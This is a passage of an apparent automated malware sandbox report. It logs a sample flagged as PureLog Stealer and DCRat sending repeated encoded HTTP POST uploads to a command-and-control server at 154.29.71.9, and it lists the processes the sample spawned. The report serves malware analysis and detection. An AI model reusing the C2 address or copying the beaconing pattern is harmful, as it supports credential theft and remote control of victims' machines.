                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:04.129519939 CET2600OUTData Raw: 59 51 5d 58 5b 5f 58 56 5b 59 5a 55 50 5b 5b 51 56 57 54 44 52 58 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQ]X[_XV[YZUP[[QVWTDRXRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8X*&*-_)=#38//U5-6+9V=-<1 X-?"Y ']/(
                                                                                                    Jan 4, 2025 14:54:04.325620890 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:04.459122896 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    139192.168.2.450146154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:04.584938049 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:04.942419052 CET2600OUTData Raw: 5c 5a 58 5e 5b 5c 58 57 5b 59 5a 55 50 5b 5b 53 56 57 54 40 52 5c 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX^[\XW[YZUP[[SVWT@R\RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>22P>=+7083,>T!?!5W*-+2:/"Y ']/(
                                                                                                    Jan 4, 2025 14:54:05.246531963 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:05.378247976 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    140192.168.2.450147154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:05.506494999 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:05.863966942 CET2600OUTData Raw: 5c 5e 58 5c 5e 58 58 55 5b 59 5a 55 50 50 5b 52 56 57 54 46 52 5b 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^X\^XXU[YZUPP[RVWTFR[R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^/=9Z1->-(([43;0[; "U6>#W!(=T)X8C%3(-"Y ']/
                                                                                                    Jan 4, 2025 14:54:06.051100969 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:06.183644056 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    141192.168.2.450149154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:06.304794073 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:06.660742044 CET2600OUTData Raw: 59 51 58 59 5b 55 58 53 5b 59 5a 55 50 5b 5b 5a 56 50 54 46 52 5c 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQXY[UXS[YZUP[[ZVPTFR\R^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.=9_11>>#+'R3]</#*"$58V(>/&,X9"Y ']/(
                                                                                                    Jan 4, 2025 14:54:06.840665102 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:06.973901987 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    142192.168.2.450150154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:07.100914001 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:54:07.457937956 CET2600OUTData Raw: 5c 59 58 5b 5b 59 58 54 5b 59 5a 55 50 5f 5b 5a 56 55 54 40 52 5d 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX[[YXT[YZUP_[ZVUT@R]RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[8X*&89?>$Z+.;S$^.3"#W#8!V)%(\9"Y ']/
                                                                                                    Jan 4, 2025 14:54:07.619982004 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:07.754127026 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    143192.168.2.450151154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:07.882301092 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:08.238826990 CET2600OUTData Raw: 59 51 58 59 5b 5d 58 55 5b 59 5a 55 50 51 5b 56 56 50 54 45 52 5d 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQXY[]XU[YZUPQ[VVPTER]RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,%_%-=3?'$(',-6W!(>72U4./"Y ']/
                                                                                                    Jan 4, 2025 14:54:08.398814917 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:08.526118994 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    144192.168.2.450152154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:08.655899048 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:09.004530907 CET2600OUTData Raw: 5c 59 58 5d 5b 5a 58 55 5b 59 5a 55 50 5b 5b 56 56 52 54 44 52 5c 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX][ZXU[YZUP[[VVRTDR\RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,>&&^"T*3?+3<Z, "V!/T!%Q=.$2$\-"Y ']/(
                                                                                                    Jan 4, 2025 14:54:09.182976007 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:09.373821974 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    145192.168.2.450153154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:09.504528999 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:09.863852978 CET2600OUTData Raw: 5c 5e 58 5c 5b 58 5d 56 5b 59 5a 55 50 59 5b 55 56 55 54 45 52 5c 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^X\[X]V[YZUPY[UVUTER\R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\98>6&(U)?+=/''.0=6$!(=<D2(\."Y ']/
                                                                                                    Jan 4, 2025 14:54:10.021614075 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:10.150187969 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    146192.168.2.450154154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:10.272804976 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:10.629431009 CET2600OUTData Raw: 59 5f 58 5b 5b 5e 5d 51 5b 59 5a 55 50 5c 5b 5b 56 5c 54 47 52 58 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_X[[^]Q[YZUP\[[V\TGRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,:&8=$X(,%($[.3)568)W)X;%U$-"Y ']/4
                                                                                                    Jan 4, 2025 14:54:10.789506912 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:10.918051958 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    147192.168.2.450155154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:11.060946941 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    148192.168.2.450156154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:11.307321072 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:11.660742044 CET1856OUTData Raw: 59 5d 5d 5d 5b 5d 58 50 5b 59 5a 55 50 5d 5b 56 56 51 54 42 52 50 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y]]][]XP[YZUP][VVQTBRPRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/&^1)=$[(7V'+,1!=$!> &0$]:?"Y ']/0
                                                                                                    Jan 4, 2025 14:54:11.834041119 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:11.962294102 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 13 25 29 3a 1d 25 03 30 51 2e 02 21 1b 2b 30 31 1b 3b 2d 27 02 29 39 23 19 2c 55 2f 12 3e 28 0f 18 3e 31 33 19 32 2f 3c 58 2b 26 20 51 03 12 27 12 25 29 0f 03 29 0d 2e 05 2d 2d 3c 08 21 32 3f 11 27 2a 07 03 36 3e 22 07 25 2c 3a 09 28 2c 3a 0d 2d 10 06 02 2e 1d 24 53 3f 15 23 55 0b 1f 25 56 27 08 37 09 31 16 19 05 3f 09 28 12 3f 03 30 0b 34 04 2f 01 25 00 2d 03 27 1f 1c 0e 24 1f 39 16 33 0d 25 17 36 00 28 05 31 10 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"%):%0Q.!+01;-')9#,U/>(>132/<X+& Q'%)).--<!2?'*6>"%,:(,:-.$S?#U%V'71?(?04/%-'$93%6(1.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    149192.168.2.450157154.29.71.980
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:54:11.455478907 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:54:11.801345110 CET2600OUTData Raw: 5c 5a 58 5a 5b 58 5d 50 5b 59 5a 55 50 5c 5b 5b 56 52 54 49 52 5e 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXZ[X]P[YZUP\[[VRTIR^RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/&&2*7)=$3]<;3%"[ 69T)>$&8Z:/"Y ']/4
                                                                                                    Jan 4, 2025 14:54:11.972917080 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:54:12.102389097 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:54:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:08:51:58
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe"
                                                                                                    Imagebase:0x130000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"
                                                                                                    Imagebase:0x7ff688e60000
                                                                                                    File size:2'759'232 bytes
                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    Wow64 process (32bit):false
